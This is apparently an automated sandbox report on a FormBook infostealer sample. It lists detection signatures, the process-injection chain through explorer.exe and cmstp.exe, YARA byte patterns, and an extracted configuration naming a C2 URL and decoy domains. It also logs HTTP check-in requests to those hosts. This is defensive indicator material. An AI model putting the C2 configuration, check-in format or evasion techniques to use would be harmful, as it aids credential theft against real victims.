
Analysis Report TazxfJHRhq.exe

Overview

General Information

Sample Name: TazxfJHRhq.exe
Analysis ID: 383852
MD5: f818665dd48a93c48255d3ceadf92a6e
SHA1: 2567c8a3e1a3e3e98782ea8d0d117518ccd4291b
SHA256: 6bb8fa14bf9c650a67541ffedff2e3f1c055454b90489653c95aa39284d7eb92
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Contains functionality to prevent local Windows debugging
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a Windows Living Off The Land Binaries (LOL bins)
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • TazxfJHRhq.exe (PID: 4736 cmdline: 'C:\Users\user\Desktop\TazxfJHRhq.exe' MD5: F818665DD48A93C48255D3CEADF92A6E)
    • TazxfJHRhq.exe (PID: 5940 cmdline: 'C:\Users\user\Desktop\TazxfJHRhq.exe' MD5: F818665DD48A93C48255D3CEADF92A6E)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmstp.exe (PID: 4064 cmdline: C:\Windows\SysWOW64\cmstp.exe MD5: 4833E65ED211C7F118D4A11E6FB58A09)
          • cmd.exe (PID: 5948 cmdline: /c del 'C:\Users\user\Desktop\TazxfJHRhq.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.autotrafficbot.com/evpn/"], "decoy": ["memoriesmade-l.com", "babypowah.com", "usinggroovefunnels.com", "qapjv.com", "kp031.com", "kinfet.com", "markmalls.com", "keithforemandesigns.com", "fydia.com", "jesussaysalllivesmatter.com", "sarachavesportela.com", "standerup.com", "monthlywifi.com", "productsoffholland.com", "newbieadvice.com", "globalnetworkautomation.com", "theholisticbirthco.com", "physicalrobot.com", "thesouthernhomesellers.com", "teamcounteract.com", "icomplementi.com", "jsmsheetmetal.com", "jcernadas.com", "del-tekzen.com", "alekseeva-center.info", "arunkapur.com", "gregismyrealestateagent.com", "soalfintech.com", "notrecondourbania.com", "alum2alum.network", "gototaku.com", "moneymakeideas.com", "dbdcontractlngllc.com", "tor-one.com", "walgreenlitigation.com", "votestephaniezarb.com", "washathome.club", "zhuledao.com", "sonyjewls.com", "oncologyacademe.com", "kuppers.info", "cgpizza.net", "glgshopbd.com", "dodson4tulare.com", "mishtifarmers.com", "a1-2c.com", "oligan-gs.com", "countrysidehomeinvestors.com", "bpro.swiss", "fodiyo.com", "playelementsgame.com", "melhorquesantander.com", "jamessicilia.com", "abundancewithmelissaharvey.com", "vatandoost.com", "curiosityisthecurebook.com", "o8y8.com", "de-knutselkeet.com", "advisorsonecall.com", "homerangeopen.com", "brusselsdesignproject.com", "0449888.com", "psychicsjaneholden.com", "b-sphere.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000001.00000002.248893172.00000000005C0000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000001.00000002.248893172.00000000005C0000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.248893172.00000000005C0000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x166b9:$sqlite3step: 68 34 1C 7B E1
  • 0x167cc:$sqlite3step: 68 34 1C 7B E1
  • 0x166e8:$sqlite3text: 68 38 2A 90 C5
  • 0x1680d:$sqlite3text: 68 38 2A 90 C5
  • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.219806845.00000000027A0000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000000.00000002.219806845.00000000027A0000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Unpacked PEs

Source | Rule | Description | Author | Strings
0.2.TazxfJHRhq.exe.27a0000.4.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0.2.TazxfJHRhq.exe.27a0000.4.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0.2.TazxfJHRhq.exe.27a0000.4.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x166b9:$sqlite3step: 68 34 1C 7B E1
  • 0x167cc:$sqlite3step: 68 34 1C 7B E1
  • 0x166e8:$sqlite3text: 68 38 2A 90 C5
  • 0x1680d:$sqlite3text: 68 38 2A 90 C5
  • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
1.2.TazxfJHRhq.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
1.2.TazxfJHRhq.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

No Sigma rule has matched

Signature Overview


AV Detection:

Antivirus detection for URL or domain
Source: http://www.theholisticbirthco.com/evpn/?JDK8ix=x0ZJTajXylflf9w1AOLp4z6MEeP0j5bmDWx3E2oNmzw2lecwih58OZgaRC+Q9k1hI2JG&w4=jFNp36Ihu | Avira URL Cloud: Label: malware
Source: http://www.jcernadas.com/evpn/?JDK8ix=vuWMxfkh+6vmXF1oy+zIqCJtkAbujMYD9B0ur5oCOxuFSx86Hqk4MPW+e95bZxU45kLf&w4=jFNp36Ihu | Avira URL Cloud: Label: malware
Source: http://www.usinggroovefunnels.com/evpn/?JDK8ix=ISts4gbMhqyuTmKrSHZmognB97NvFE2BZp5yYtc0d8I84ULtNRTPjTWlODLK7CpkytNF&w4=jFNp36Ihu | Avira URL Cloud: Label: malware
Found malware configuration
Source: 00000001.00000002.248893172.00000000005C0000.00000040.00000001.sdmp | Malware Configuration Extractor: FormBook {"C2 list": ["www.autotrafficbot.com/evpn/"], "decoy": ["memoriesmade-l.com", "babypowah.com", "usinggroovefunnels.com", "qapjv.com", "kp031.com", "kinfet.com", "markmalls.com", "keithforemandesigns.com", "fydia.com", "jesussaysalllivesmatter.com", "sarachavesportela.com", "standerup.com", "monthlywifi.com", "productsoffholland.com", "newbieadvice.com", "globalnetworkautomation.com", "theholisticbirthco.com", "physicalrobot.com", "thesouthernhomesellers.com", "teamcounteract.com", "icomplementi.com", "jsmsheetmetal.com", "jcernadas.com", "del-tekzen.com", "alekseeva-center.info", "arunkapur.com", "gregismyrealestateagent.com", "soalfintech.com", "notrecondourbania.com", "alum2alum.network", "gototaku.com", "moneymakeideas.com", "dbdcontractlngllc.com", "tor-one.com", "walgreenlitigation.com", "votestephaniezarb.com", "washathome.club", "zhuledao.com", "sonyjewls.com", "oncologyacademe.com", "kuppers.info", "cgpizza.net", "glgshopbd.com", "dodson4tulare.com", "mishtifarmers.com", "a1-2c.com", "oligan-gs.com", "countrysidehomeinvestors.com", "bpro.swiss", "fodiyo.com", "playelementsgame.com", "melhorquesantander.com", "jamessicilia.com", "abundancewithmelissaharvey.com", "vatandoost.com", "curiosityisthecurebook.com", "o8y8.com", "de-knutselkeet.com", "advisorsonecall.com", "homerangeopen.com", "brusselsdesignproject.com", "0449888.com", "psychicsjaneholden.com", "b-sphere.com"]}
Multi AV Scanner detection for submitted file
Source: TazxfJHRhq.exe | Virustotal: Detection: 14%
Source: TazxfJHRhq.exe | ReversingLabs: Detection: 25%
Yara detected FormBook
Source: Yara match | File source: 00000001.00000002.248893172.00000000005C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.219806845.00000000027A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.475251727.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.476907995.0000000000C90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000001.214771183.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.248915082.00000000005F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.248684354.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.476715752.0000000000930000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0.2.TazxfJHRhq.exe.27a0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.TazxfJHRhq.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.TazxfJHRhq.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.TazxfJHRhq.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.TazxfJHRhq.exe.27a0000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.TazxfJHRhq.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: 1.2.TazxfJHRhq.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 4.2.cmstp.exe.4af7960.5.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 1.1.TazxfJHRhq.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 0.2.TazxfJHRhq.exe.27a0000.4.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 4.2.cmstp.exe.6bd538.1.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: TazxfJHRhq.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: Binary string: cmstp.pdbGCTL | source: TazxfJHRhq.exe, 00000001.00000002.248968735.0000000000629000.00000004.00000020.sdmp
Source: Binary string: wntdll.pdbUGP | source: TazxfJHRhq.exe, 00000000.00000003.210529727.000000001EF00000.00000004.00000001.sdmp, TazxfJHRhq.exe, 00000001.00000002.249342255.0000000000B6F000.00000040.00000001.sdmp, cmstp.exe, 00000004.00000002.478158487.00000000045C0000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb | source: TazxfJHRhq.exe, cmstp.exe
Source: Binary string: cmstp.pdb | source: TazxfJHRhq.exe, 00000001.00000002.248968735.0000000000629000.00000004.00000020.sdmp
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 0_2_00405301 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,0_2_00405301
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 0_2_00405C94 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,0_2_00405C94
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 0_2_004026BC FindFirstFileA,0_2_004026BC
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 4x nop then pop ebx | 1_2_00406A9B
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 4x nop then pop edi | 1_2_004162B4
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 4x nop then pop ebx | 1_1_00406A9B
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 4x nop then pop edi | 1_1_004162B4
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4x nop then pop ebx | 4_2_00406A9B
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4x nop then pop edi | 4_2_004162B4

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49745 -> 192.185.48.194:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49745 -> 192.185.48.194:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49745 -> 192.185.48.194:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49747 -> 52.58.78.16:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49747 -> 52.58.78.16:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49747 -> 52.58.78.16:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.autotrafficbot.com/evpn/
Source: global traffic | HTTP traffic detected: GET /evpn/?JDK8ix=fhrZBjxaI0WDrOMMLB9i/eTcrXrQxugx+jgojm7BAd6fBe64JiOWliSCzfUjPirJzJCm&w4=jFNp36Ihu HTTP/1.1 | Host: www.jamessicilia.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /evpn/?JDK8ix=tTQY57yJV1PB58vhZsfw1idcR39uzoBhuFhBLA0LfuUY3fYfkSmldauzSZkrcgPEdi+f&w4=jFNp36Ihu HTTP/1.1 | Host: www.kinfet.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /evpn/?JDK8ix=0M6ZQgL8IcDyCwomro3oU0+S4lgLLFgc0WEYasg9Je1ZokoU9qr9vbqVIYlP2JKTB372&w4=jFNp36Ihu HTTP/1.1 | Host: www.productsoffholland.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /evpn/?JDK8ix=KkWhScBkby78tLALzdAz8CnCjb47jVkq+/iIMgqrMbFUrtE+6VX7P3g+12tQT1WZakud&w4=jFNp36Ihu HTTP/1.1 | Host: www.markmalls.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /evpn/?JDK8ix=eugAyVbFjTGCbHTU5QCJaxOKGF+rVHXRgES2jcHdoUQlFxVgByKSQwjGascFDT08oG3Y&w4=jFNp36Ihu HTTP/1.1 | Host: www.zhuledao.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /evpn/?JDK8ix=vuWMxfkh+6vmXF1oy+zIqCJtkAbujMYD9B0ur5oCOxuFSx86Hqk4MPW+e95bZxU45kLf&w4=jFNp36Ihu HTTP/1.1 | Host: www.jcernadas.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /evpn/?JDK8ix=x0ZJTajXylflf9w1AOLp4z6MEeP0j5bmDWx3E2oNmzw2lecwih58OZgaRC+Q9k1hI2JG&w4=jFNp36Ihu HTTP/1.1 | Host: www.theholisticbirthco.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /evpn/?JDK8ix=MYo3qtR4MoTJM9eEEEQJY+2owLrirHbqorePLbwYxji+asNtirv2kfx8Flc200WiuFJj&w4=jFNp36Ihu HTTP/1.1 | Host: www.tor-one.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /evpn/?JDK8ix=SbzT885gMwI0SrecOCVR7+X63g3QiQnq4cO3Mq/wdHuk7Bui5+S2HJ4sI04qlEXUDlVA&w4=jFNp36Ihu HTTP/1.1 | Host: www.de-knutselkeet.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /evpn/?JDK8ix=rbKZoqFNxKUJa45rmf723j5e1+/Af1Vmd22uFdYYwCe+W7Lpy/kHCEK0lxAuMCiY39Cm&w4=jFNp36Ihu HTTP/1.1 | Host: www.autotrafficbot.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /evpn/?JDK8ix=lIAMQw8Bc5WvbtZzc5MVHUptsiPc1Sl8tBJqhUvlbuUAA7ypaYYvmQWduCHy/+CL3sQ0&w4=jFNp36Ihu HTTP/1.1 | Host: www.curiosityisthecurebook.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /evpn/?JDK8ix=ISts4gbMhqyuTmKrSHZmognB97NvFE2BZp5yYtc0d8I84ULtNRTPjTWlODLK7CpkytNF&w4=jFNp36Ihu HTTP/1.1 | Host: www.usinggroovefunnels.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /evpn/?JDK8ix=uC/MtWgv+YrXZeFWxw8c+UMLGaJCPPY/UiwLcWwP6A/e3Dk62IKxdmGhKI0+YBSelN0N&w4=jFNp36Ihu HTTP/1.1 | Host: www.cgpizza.net | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /evpn/?JDK8ix=mJ1WicGgYxGiPfNmi48PwwH9NxkuMiIXMjFvraRfIBMfYxjrtIxgIRAmB9RzgRW7JS2o&w4=jFNp36Ihu HTTP/1.1 | Host: www.physicalrobot.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /evpn/?JDK8ix=fhrZBjxaI0WDrOMMLB9i/eTcrXrQxugx+jgojm7BAd6fBe64JiOWliSCzfUjPirJzJCm&w4=jFNp36Ihu HTTP/1.1 | Host: www.jamessicilia.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /evpn/?JDK8ix=tTQY57yJV1PB58vhZsfw1idcR39uzoBhuFhBLA0LfuUY3fYfkSmldauzSZkrcgPEdi+f&w4=jFNp36Ihu HTTP/1.1 | Host: www.kinfet.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | IP Address: 52.58.78.16
Source: Joe Sandbox View | ASN Name: AMAZON-02US
Source: Joe Sandbox View | ASN Name: GD-EMEA-DC-CGN1DE
Source: Joe Sandbox View | ASN Name: ANONYMIZEEpikNetworkCH
Source: unknown | DNS traffic detected: queries for: www.jamessicilia.com
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 08 Apr 2021 09:10:22 GMT | Content-Type: text/html | Content-Length: 153 | Connection: close | Server: nginx/1.16.1 | Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>
Source: cmstp.exe, 00000004.00000002.479835773.0000000004C72000.00000004.00000001.sdmp | String found in binary or memory: http://bitly.ws/9qZUevpn/?JDK8ix=ISts4gbMhqyuTmKrSHZmognB97NvFE2BZp5yYtc0d8I84ULtNRTPjTWlODLK7CpkytN
Source: explorer.exe, 00000003.00000000.237042288.000000000F674000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: cmstp.exe, 00000004.00000002.479835773.0000000004C72000.00000004.00000001.sdmp | String found in binary or memory: http://www.physicalrobot.com
Source: cmstp.exe, 00000004.00000002.479835773.0000000004C72000.00000004.00000001.sdmp | String found in binary or memory: http://www.physicalrobot.com/
Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 0_2_00404EA0 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,lstrlenA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00404EA0

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 00000001.00000002.248893172.00000000005C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.219806845.00000000027A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.475251727.0000000000400000.00000040.00000001.sdmp, type: MEMORY
